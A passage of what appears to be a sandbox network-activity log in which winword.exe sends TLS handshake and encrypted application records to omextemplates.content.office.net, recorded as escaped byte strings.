346. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flau\\xf4\\xb7\\xe8:\\x93\\x8ful\\x0e\\xe6\\x84\\x97\\x99\\xab`\\xf6\\xfbm\\x13\\xcc\\xbc\\xac\\x8b\\xd8\\x0c/\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
347.  
348.  
349. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flecr\\xf2\\xfb\\xd1\\x8a\\x01s\\xae<\\xac_\\xfcn\\xee$1a\\x89s>\\xe5`q2\\xf9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
350.  
351.  
352. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x1cd\\x9e\\x85!f\\xa0\\xf03\\x1a_\\x1349\\xf2\\x8cmv\\xd7\\x06\\xb9\\x81\\xf6\\xb5\\xcag\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
353.  
354.  
355. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x17\\xf6\\xe3g\\xd2\\xdb\\xeb\\xd4\\x833m \\x0b\"\\xd0y\\xa5\\x01\\x185\\xf8\\x11\\xc3\\xd1\\x93^8-\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
356.  
357.  
358. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flbem\\xacd\\xbe_\\xc4l\\xbf\\x1d!4(\\xa4\\xa3);\\xf0\\x99\\xad7c\\x91b\\x87y\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
359.  
360.  
361. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x81\\xde\\xddg\\x95\\x04l28~lv\\xe5f\\xd6\\xf8\\xa1q\\xef7k\\x7fz)4\\x0b \\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
362.  
363.  
364. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\x94\\x1a\\xce\\xd1\\x98\\xb3db\\xf7\\xde\\xebs\\xe5\\xe2\\x05j\\xc2\\xb0\\xeb\\xeb\\x11)\\xe3\\x03fjx\\x8f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
365.  
366.  
367. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04@\\xde\\x10\\xe4\\x02\\xa7q:\\xb0*\\xb5\\x06\\xb1\\xe6(\\x85k\\xc6\\xda\\xbbs\\xee\\xa2\\x16\\x01?\\x0c\\x00)a>\\xb1h\\xfc\\xaaese\\xd4\\xda\\xa9\\xc9)\\xde\\xeb\\x92=ro\\xca\\xa1p\\xcfh\\xd0\\xee\\xfd\\xd3zw\\xd0\\xc4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000w\\xe2u_\\xaex>\\xd7\\x95\\x7fb&8\\xd0&y\\x1e\\xc7\\xd55x\\xdb\\xd7\\x0c\\xa1&t\\x02oa\\x98|2\\xc0>y\\xe1q\\xbc.\\xb5\\xa6x\\x10q\\xf5\\x81"
368.  
369.  
370. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x041\\x149\\x1e\\x7f\\x0c)r\\xce0\\xe4`o\\xee\\x9e\\xe6n\\xa27\\x03\\x99\\xa7ax<\\xb4\\xca\\x1c\\xef_\\xe6\\x9dh\\xbf\\xe3a\\x04\\xbf)\\xb0'/h\\xdd\\xf6\\x8c\\xd6_\t\\xaf\\xcf\\x823\\xfa\\xd2p\\xd0\\x0b\\xd1v \\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9c$\\xe8\\x99-\\x1e\\x80-\\xe8\\x0f\\xd8wa\\xf035\\xcdw7\\xbfg\\xd6\\xe4\\xb4\\xaaqr\\x16\\xef*l\\x8dw\\xeb cre\\x01g\\xce\\xae\\xc5\\xd7+9\\xbdl"
371.  
372.  
373. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xddau\\xdf\\x17\\xf7\\x9d\\xf6\\xc2\\xa5l\\xee\\x12\\xc6\\xf4\\xf2\\x83\\x16f\\xda6m\\xf3f;fo\\xdd^\\xa5\\x89\\xd4=\\x10q\\xa1\n\\xa5\\x9ay\\xea\\xb4\\x96\\x0c#r\\x9ao\\xe8|0\\x98\\x8e\\xc9\\xf9\\xd9\\x0c\\xe2\\xbfs\"\\x06q*\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000rb\\xeb\\x8cw\\xad\\x13\\xdej\\xfe\\xeejk\\xa4x\\xe7\\xc4q\"\\xd4\\x01\\xc2\\xedf\\x15\\x14\\xc4\\xe1\\x15\\x03\\xa1\\x8d\\xfau\\xbc\\x0cz\\x82\\xcb#\\xd6\\xdd\\xca\\x11\\xd2i"
374.  
375.  
376. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe9\\xb4\\x86\\xfc\\xc4\\xab=\\xaaj\\xbc\\xff\\xe5\\x80$\\x9d\\xdd\\xb9\\xddmf_\\x8fl\\xdf\\x00\\xbcj2q\\xe3w\\x0f\\xf8\\x82\\xf6\\xff\\xdc\\x1c\\x08\\x930\\xb7\\xaf\\xec\\xf1\\xad\\xed\\xa4\\x1a\\xd7%\\x9b\\xd1\\xed\\xa0a\\x82\\x96\\x03\\xf85\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8f\\x13\\xf5\\xecc!\\xc9j\\x02l\\xec\\xc7p\\x9b\\xd0j\\xa6\\xaf\\xccp\\x06o\\xac\\xfb\\xddp\\x18\\x9e\\xdd3\\x98\" (x\\xbf\\xca\\xb8;stl\\xb5\\xfe\\x9a\\x10\\x97"
377.  
378.  
379. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbb\\x1d\\xb6\\xf3%s\\xd5\\x92\\xf4\\xeew0\\x01\\x89\\x9e\\x05a2\\xb1\\x7f\\xdd\\x07g\\xa5\\xcc\\xfa\\xdf\\xd8jj\\x1b\\xf5\\xa5\\xee\\xca\\xad\\x0c+\\x1c\\xed\\xdfu\\xdc\\x88\\xe2|\\xda\\x088\\x9a\\xb4\\xd5l\\xd9\\x85s\\xf5\\xa09\\xa0\\xcbe;g\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000<;m.\\xb4\\x89>\\x80\t\\xaf\\xf6n\\xc4\\xe6c\\xa76\\x1ava\\xd4\\xe0o\\x9b.\\xa8\\xb3s\\xe3\\x8d\\x86\\xfalviby\\x945\\x08\\x7f\\x14\\x85\\x9e\\xe3\\x04=\\xd1"
380.  
381.  
382. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xaa\\xf0\\xcdlp\\xb8\\xf3t\\xd8\\x88\\x10\\x94\\x9a\\xeb\\xfe\\xa7\\xd56\\x8e\\xbc\\xb5\\xa7\\xceubm\\xf8^\\x01\\x00u,by\\x13\\xe0\\x9es\\xbbc\\x9b\\xe6\\xe6\\xcc\\xd1h\\xee\\xcaa\\xa9\\xb4\\x02\\xcc\\xf57\\xcd\\xc30,ny/\\x1f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xcdk\\x85\\xa5\\xcd\\xfa\\x8f\\x08\\x02\\xf0\\x8c&\\xfdil\\x04q\\x8f\\x93\\xbf\\xa3k-\\x87\\xb9dc\\xb4\\xf3\\x7f\\xc1\\xfdxd\\xd3u\\x8a\\xa4\\xcc\\x04\\xdb:v\\x16\\xc3\\x1ak"
383.  
384.  
385. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x07\\x1e|'(asyh\\xbf\\x87\\x1dz\\xcc\\xca\\x18\\x9e\\xb0'\\x9a=\\x14\\x1f0\\x01&\\xbe\\xd2*-t=\\x1d\\x89\\x161\\x19n3\\xc4\\xe1\\xedl\\xb9kg\\x99\\x9as\\xefx\\xb0fz\\x82\\x92\\x89\\xcc\\xaam\\xbch\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xee.\\xcf\\x81(>e#\\xc1\\xd3\\xc8d>\\x8e3\\x07\\x1f\\x9a\\x85nh(\\x99'\\xbd\\x88`\\x92<g\\xfcfzd\\xbcj\\xfe\\x07\\xbe\\xd7\\x08\\xcd\\xd4*\\x83\\xcd\\xb1v"
386.  
387.  
388. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb4e`\\x97\\xc9h\\x92n2\\xc7\\xff`n\\xd5\\xd1c>v>\\xca\\xc2n\\xffx\\x0c\\x13\\x1e\\xf4%\\x98\\x0f\\xf5\\x06\\x88s\\x07\\x12\\xba`\\xe1\\xf4\\x96\\x88\\xe2\\xb0wa<\\x8ff\\x87\\xb6=(\\x11\\x98\\x04ssj\\x84\\x9bw\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000i\\xcf\\xf2\\x80\\x8a\\xaa\\x98paoqr\"lq8\\x11\\xc0\\x92\\xcf\\xc8\\xc4a\\x07\\x8d\\xd3z\\x97\\xb6\\xd8\\xcc\\xbf\\x15\\xe0\\xdf&\\xbb\t\\x91m-9cf\\xe4i\\xb6\\xe2"
389.  
390.  
391. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04r\\xbf\\x9f\\xed\\xfb7\\x92\\x177\\x9a :=x\\xc7\\x97\\xe3\\x02\\xd5\\xda\\xdb\\x80p\\xecj$\\xce\\xf1r\\xe0\\xc0vm>\\xb2\\xb2|\\x19\\x9c#\"\\xf7@r\\xc0\\xe4\\xae\\x95:r\\x10k\\xed\\xdb\\xaa\\xae\\xbb\\x07\\x0eny\r\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x870\\x0f\\x17\\x86)\\xfd\\xec1e'\\xdd\\x83\\x18s\\xb2\\xe1\\xd3\\xd5\\xf1\\x16!\\xd5\\x99\\x03)vk\\x92\\xd1lxc\\xe0\\x08a\\x1b\\x10\\xe94\\xd5\\xdc-\\xde\\xf1b\\x18"
392.  
393.  
394. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0106k\\x0b%\\x81\\x01\\x0b\\xf5\\xd9=\\x937\\xb2\\xd34\r\\xe4\\xba\\x02ar\\xc2l\\xa0e\\xa3\\xd2e\\x15\\xcd7@l\\x88b\\x92\\xc9\\x8e2\n\\xb1#,\\xea\\x9e\\xb4\\xa5\\x1ax\\xd4\\xc5\\x80\\xc74-\\xd5\\x18_\\xc91(\nmp-2\\x1e\\xbdw\\xdd\\x11k3\\x16n\\xcb\\xfb.\\xdc\\x9a\\x87\\xdc\\x12\\x16\\xec5\r=.\\xbc+\\xdfn\\x14e!\\xa6^c\\xac\\xaa\\xa1\\x94\\xa29\\x94\\xa9&b\\x9d\\x11\\xc8\\x86v\\xb6\\x084;_!\\xe6\\x08\\xaf\\x8f,\\xb2\\xb7\\xbdo\\xa5\\x07\"x\\xda\\x07\\xfa\\x9f\\xed\\x8ck\\x9b\\xe4\\x96\\x92\\xe7\\x1d\\xccs\\x90\\xad\\xdc\\x96cp\\xe7`\\x90qt\\x0f\\xe8\\xa3g\\x8c\\xd0\\xca\\x07\\xc2p\\xcc\\xdd\\xb3\\xb4\\xf7\\x94\\x07\\x88\\xb3.$\\x99\\xca5\\xb6\\x94\\x81\\x0f \\xc6\\xc8\\xd1i\\xa9\\xa8\\xa8\\x9c=\\xcd0\\xd5\\xf1o\\xaf\\xa1\\x9f\\xdaa\\xb6\\x13\ru\\xac\\xc5\\xdf%\\x04\\x1dp\\x85z\\xfa\\xc3%t\\xde\\x0cs3;\\xb3\\xcb\\xa3b\\xdb!\\xaad\\xaf:\\xae;\\x84\\x83\\xfa\\xea\\x981i"
395.  
396.  
397. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010khg\\xce\\x9e|\\x12wx\\x0f\\x1a\\xf3\\x92ez\\xb7<j\\x17\\xa4\\x80\\x8b8-g\\x18\\xa4w9\\x13el\\xe3\\x8a\\xef\\x91og\\x8b\\xc1\\x8a?\\x8d\\x9d\\xc9,z\\x02gn;\\xd0\\xd3\\x17i\\xd5&\\x91\\xe4\\xac\\xf7zn\\xcaf\\xf9\\x14\\xd1s=\\xf5\\x8e\\xf8\\xe46\\xa4\\xc8&\\xd1\\xf1\\xf3\\x00\\xd7c\\xed\\xff^\\x9e\\xe4\\xecv\\x1c\\xae\\x0e\\xcf\\xb8?\\x03\\xac\\xf5\\x92\\x80i\\x1a\\xd0\\xe7\\xae\\xa3\\xe6\\xcf\\x88\\xf3j\\x98\\xb9\\xdcw@1\\x91\\xf7^6\\xf3\\xf8\\x9c\\xc6\\xa5\\xf9:\\x11h\\xde\\x91\\x84\\xe3\\\\x93\\x92\\x02\\xb7\\xe0'\\xec\\xbf\\xcad\\xd6\\x033=vc\\x1e(\\x97\\x93\\xa2\\xca\\xdf\\x1ds\\xb3\\xa3\\xb7\\x0f\\x85\\x84\\xe9;\\xad\\xe1\\x1ay\\x99n\\xcbi\\xc9@\\x99\\xf8\\x964_\\x1c\\x8b6k9:\\xeenf\\xdc \t\\xaa\\xa3k\\xec\\xb7\\x1ei:\\x86\\x8c\\xcc\\xa0.\\x99\\x08\\xc8\\x95\\x18\\x97\\xef\\xd0\\x84\\xc8\\xfa\\x05\\x94+\\xf8y%\\xca|\\x12\\xe1\\x12\\x9e\\xde,\\xb7\\xa2\\x9c\\x9dh\\xa7\\xd6\\xdef\r'\\x08 :pz"
398.  
399.  
400. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x7fn\\xdca\\x0fw\\x9el\\xd3bo\\xd3q\\xc6\\x98\\xb1\\xc8(.#\\x81\\x01\\x98n\\xcf\\xbe\\x93\\xeb\\xf4\\xde\\x9b\\x16al\\xe4l*\\xa6\\xac\\xeb1\\xe6\\xb5;\\xcfp\\x02\\xd3u-\\x1aq\\x94\\xba\\x15\\x1f\\x8d\\xcc7\\xc3d1\\xc4\\xb0\\\\xe8\\xcep_u\\xc5<\\xc3\\x14\\xb1\\x8f\\xc0\\x9f\\x1c+\\x97\\x81\\xda\\xc2\\x91)\\xd8g\\xd6\\x92w,@\\x9a\\xb4s\\xbafr\\x92\\xf50\\xe1\\x9d*\\x92njb3l\\xb0\\x9c\n\\x10\\x17)\\xb0\\xc3aw\\xd9\\xd7m\\xe2.\\x97%\\xa23\\xb9\\xca+\\xb6@!j\\xa5\\xbdh\n.hu\\xb8\\x87\\xae\\x84\\xfc$\\x8c\\x96\\xe7\\xc4\\x17\\x0f\\xf3\\x00\\xaea\\x10\\xbe\\xb6%\\x1d\\x7f\\x02\\x06\\x86twk\\xa55\\xdc\\xe8<\\xa59h\\x8d,\\x90\\xe0b\\xb8g9u8%\\xe6\\xc0\\xec\\x7f\\xab\\xda=+\\x04\\xc5\\xea(\\x95\\x19\\xf4)ot?r\\xe28\\xd5 \\xde\\x05p\\xba\\xef'\\x8a$bq7\\xe4\\xe4\\xf88\\xa9\"\\x05t-e\\x86\\xe0\\xac\\xe1.\"\\xf6\\xben\\x06\\xe0"
401.  
402.  
403. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x87\\xbd\\xc1\\x13\\x80\\x9e\\xba\\x1f\\x94\\x81\\x87\\xd7\\xea\\xb69:\\xb3j\\xfah\\xa6mw\\xf0\\xa5\\x0ca\t\\xf5\\x96\\x7f\\xaa\\x90\\xe4\\xc9`m\\xa0\\xdf\\x9e\\xeb\\xa3\\x07*b\\x8c\\xc8\\x05\\xad\\x11v\\xd3\\xf1qn\\x9b\"mez\\xb2\\x9a#\\xcb\\xd4\\xa1o\\x13\\x82!c\\xfd\\xa4\\x88\\\"!t\\xdcp+\\xba\\x1d'\\x15\\xb9\\x81\\xbf\\xd8\\x1e;y\\x98\\x8e\\xaa>\\xee(\\x16\\x1e2\\xdc\\xcd\\x17\\xd7\\xaf\\xbd\\xc5\"\\xc0fr\\xe4\\x0c\\xd1\\xd9.\\xbd\t\\x9b\\x10\\xe6|\\xf5j<zs^\\x18&\\x07#\\xda\\xbe`qis\\xebs\\xa1\\xe1\\xc3\\x1e\\x03\\x92_\\xe19x\\xdc\\x06v\\xf8\\x06\\xf8\\xf61\\xed\\xae\\xaf\\xde|\\x1fb\\x98@\\xaa\\xf1\\xb9\\xb4\\x14\\xae\\xb6\\xd8\\xfe\\x00p:\\xfa\\xbe\"\\xdd\\xa6v\\xe5c\\xd4\\xaa\\x04b\\x92r\\x84\\xb9\\xda\\x0fq\\xbe\\xc6\\xa3bt%\\xd39\\xae!lz\\x81\\xf4k-\\xae\\x95\\xe3p\\x87\\x1c\\x03\\x03\\x1aj!>\\x9e\\x0b-z\\xa4\"\\xaer\\x02eq\\xed-\\xe6\\xd5\\xd8\\xf5\\x8e\\x93"
404.  
405.  
406. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x12\\x82\\xf3\\xf6\\xb2v\\xe1\\xd2,|\\x03\\xf8x\\xc3\\xe5\\x80\\x91\\x10\\xed-\\xf8t\\xbc\\xec\\x02\\x1d\\xba\\xd0\\xcal@\\x1c\\x0f\\xa1o,\\xb4x\\x17\\xd1\\xc3z\\x84\\xe0\\xc2\\xe2\\x14\\xe4\\xa13@\\xe2b\\x97wmn\\xe9\\x1d\\xbd\\x96\\xda\\xdf\\x0e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\r\\xeen8\\xb9\\xb7j\\x98\\x8c\\xaa\\xb3\\x80\\xa2^\\x94j\\xc1t\\xd1\\xcc\\xbepzpeq\\xdfc\\x8c\\xf4\\x11\\x1b\\xb2\\x1dc\\xe0\\x0f\\xfc\\x8ec\\xb9\\xb0\\xf80\\x89i\\x05\\x81"
407.  
408.  
409. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x88\\x1d;\\xd1\\xc0\\x94\\x84\\x0c9`\\x06\\xcd\\xdb\\xa2s\\xd1\\xa7lii\\xc9q\\xca\\x106l ?:\\xfe\\x9e\\x00\\x7f.\\x817)\\x02\\xf1\\x0b\\x04y\\x18\\x1c_\\xbb\\xf1@\\x838\\xd1\\x9f\\xb9\\xf0h\\xb6<\\x87\"\\xcf\\xae\\xf0\\xb9\\xdd\\xb5\\x9e\\xb9\\xc1\\xec\\xe4\\x84-\\xe2\\xed\\xdf!\\xf8\\xe4\\x88\\xaa\\\\x02\\xdck\\xdd\\xba\\xa9|\\x98\\x05\\x8c\\x05qw\\x14o\\xdc7\\x9d\\x85r\\x18uo\\xa3\\x9c\\x88!\\xc6\t\\x19\\xbf\\x13@\\xd4\\xade!\\x86\\x95\\xb1\\x99\\xfb\\xe9q\\x95\\xb4\\x05\\xc7r\\xb3\\x83\\x15\\xef\\xd2\\xfcyh\\xb3th\\xe5\\xe4\\x8c\\xcdf\\xfaa\\xf1c\\xf2k\\xc0o\\x1b\\xf0%\\xeb\r\\x18\\xd1\\xa0s;\\xb5\\xb9e&\\xb4>\\xf2\\xf5\\xae\\xb8\\x82pz\\x0e7m\\xdc\\xa2\\xe5jo(th\\xe9\\x05e\n\\xb0\\xa3q\"z\\x02\\x94\\xb51\\xff\\x83r.5#xk#c)\\xd1\"\\xc8\\xf0dz\\x82k\\xbf\\xdeg\\xb5iif\\xb6\\x0f^hb\\xb8\\xc5pw\\x17\\x9b\\xf4\\x9f98uc\\x95\\xa4"
410.  
411.  
412. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x84\\xdb\\xce\\x05\\xed\\xb1\\xbe\\x05\\x19\\xed\\xab\\xa2\\x01:7h0`\\x7f\\x8f\\xa4g>\\xb2j$pe\n\\xad\\xac\\xcc8ou\\x87\\xd0k\\x8f\\xdd\\xb9\\xcf\\x1e\\x9c\\xf3\\x00\\x88\\xb7\\xf8\\xbb\\xf1is\\x9a\\xe1@\\xa4\\xb9;\\x8b\\xa0\\xe9=+<\\x93g\\xc2o\\xffc\\xc4\\x897\\xa7\\x96\\xab8\\x04p\\x1c\\xda\\x9b)p\\xf3\\x7f\\xeb\\xe8\\x82*\\xfd\\x065\\x84<;\\xaa5a\\x95\\xef\"k\\xb3\\x14i\n\\xd3\\x1c\\xd9\\xd5\\xa6\\x8fd\\x14\\xcb\\x18j\\x8e\\x1f\\xaa\\xae2\\xda\\xd9\\xd7\\xb6\\xa9\\xe6\\xa2\\xd8\\x9d\\x083\\xfd\\x85\\xe6\\x7f\\x8b\\x15g\\xdf4+l8\\xb9\\xe0\\xab\\xe7\\xfa\\xb4\\xec!\\xaa\\x9f5\\xcb\\xc3\\xdf\\xba;x \\xf19\\x93<ig\\xf9mw\r\\xcc\"ap\\x9e)\\x0fd0\\xfeq8\\x1d\\x14.d\\x80u\\x10\\x7f\\x0b+y\\xd2\\xda\\x05\\x96\\xac\\x82\\xbbb\\xb7\\x8f\\xd6\\xe6\\xec\\x99\\xd3\\xd7\\x1fcqmu\\xa1\\xf7\\xd1\\xe7\\x88\\x04\rx\\xdb\\xee\\xa3s\\xca~0g\\xdf/zg\\x86i\\xf8\\xe7\\x9b\\x85\\x93\\xfd"
413.  
414.  
415. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1a\\xde\\xc91\\xe2\\xeb\\x9c4\\xfa\\x90\\xc46\\x01\\x08\\x19q\\xf2\\x93\n\\x8c\\x0f\\x91,_\\xac\\xe8\\x19\\x93w\\xbc^\\x89u\\xb5:\\xc0\\x00\\xae\\x8c\\xe0\\x04,\\xc4\\xa0\\x9b\\x80\\xfb\\x07\\x0c\\x17\\x11\\x85\\xea8\\x1c\\xcb\\xdbq\\x9b\\xe7\\xc7\\xb8^|\\xc6\\xf4\\xcf\\xbf9l3%\\x1a\\x1a\\xc3fs)1\\xb0\\xe0/\\xe5\\xec\\xc7\\xe4\\x82\\xa1\\xa7\\xc4b\\xde\\xba\\xe6\\xaew\\x01hgh\\xc6a\\x8a\\x18\\x9f\\xc7g\\xec\\xe3\\x13\\x13\\x0ezwyh\\x003v\\x93\\xd9zop\\xcb\\xd3\\x9c\\xf9i\\x14\\xf8l\t>g\\xc8\\xca\\xa6j\\xf3\\xdd^\\x02\\xe3\\xf4\\xffr\\x85\\xfbv\\xb1.s\\xca\\xbf=\\xa5@\\xaf\\xda\\xfce\\x1b\\x96\\x9e\\xfc\\xeed\\xa3\\xf3\\xbdn@\\xfa\\x8cs\\x18m\\xfc\\xa4\\xcd\\xe3\\x9f\\x93\\xe0o(\\xa5\\xbb;\\x96<\\x03z\\xe4r9\\xa2z\\xdcg\\xd7\\x88\\xa2\\x8b\\x84\\x8d\"\\xa1\\x8f\\xc9\\x9a\\xb2\\xbe9\\xe8\\x83\\xcd\\x0b;\\x9bp\\x82\\x8b\\xd6\\xe8\\xdd\\x82`\\x06\\x99\\x9e\\xc4\\xff\\xa3\\xf9o\\xee(\\xef\\x9az\\xb3c\\x94\\xd6"
416.  
417.  
418. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf0\\xc3\\xdfg\\xab\\xe5,'h\\xd8q\\xbax\\xec_aq\\xcfq\\x07c\\x18\\x82\\xe8;-\\xc1\\xe1c\\xfbm\\xa8\\x84\\x98 t\\x0e\\xe1\\xd5.\\x13%\\x99jy#\\xb3\\x9dv$\\x13\\xc1\\x8a\\xbe\\xe93\\xf3\\xcc\t\\xbd\\x81\\xdf\\x0fe\rvd\\x8b\\xeajobf\\xa8\\xd9\\xdc'`\\xa7\\xbd)`\\xae\\x05\\x9e\\x9d\\xac\\xa7\\xf5\\x80pj\\xb4\\xdb\\xea)|\\xe2\\x0bqi\\xb4s\\xa0:\\x91`dn\\x05\\x1ap,l\\xb8\\xea\\xf5s\\x92\\xaa\\xa4alcv\\xb0\\xeetv\\xbcf3\\x9f\\xcf\\xd1=\\xe3\\x05\\xb0yl\\x9a\\x1c\\x00y\\x18\\xff'\\xe9lw\\xbb\\xe4\n\\x10c\\xdf\\x85\\x14\\xf1|f!v\\x04l\\xf9p\\xd3\\x8b\\xa12\\x13\\x17\\xb6\\xc8if\\xec\\xd9:\\xfc\\xb7\\xaf\\xaf\\xe2\\x00\"c#\\xca\\\\x00hu\\x06\\xa1\\x9b\\xc0\\xd5c\\x00\\x0b\\xb9y\\xa2w\\xb7\\xa3\\x9fc\\xa3\\xd9m\\x82\\xd4)\\xe2\\xb1n\\xd6\\xec\\xa3v\\xee_\\xeb\\xe3\\xf3w`\\x93\\x14ie\\xf5\\x9c_\\xb3\\x0co\\x17h8\\xfa\\xfa"
419.  
420.  
421. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl'\\xa5\\xc0\\xcf\\x84\\xc8\\xde\\x9fs\\x95\\xf1\\x00\\x7f\\x1f\\xe0\\x946\\x11\\xce\\xf1a\\x11-\\xb2;i$\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
422.  
423.  
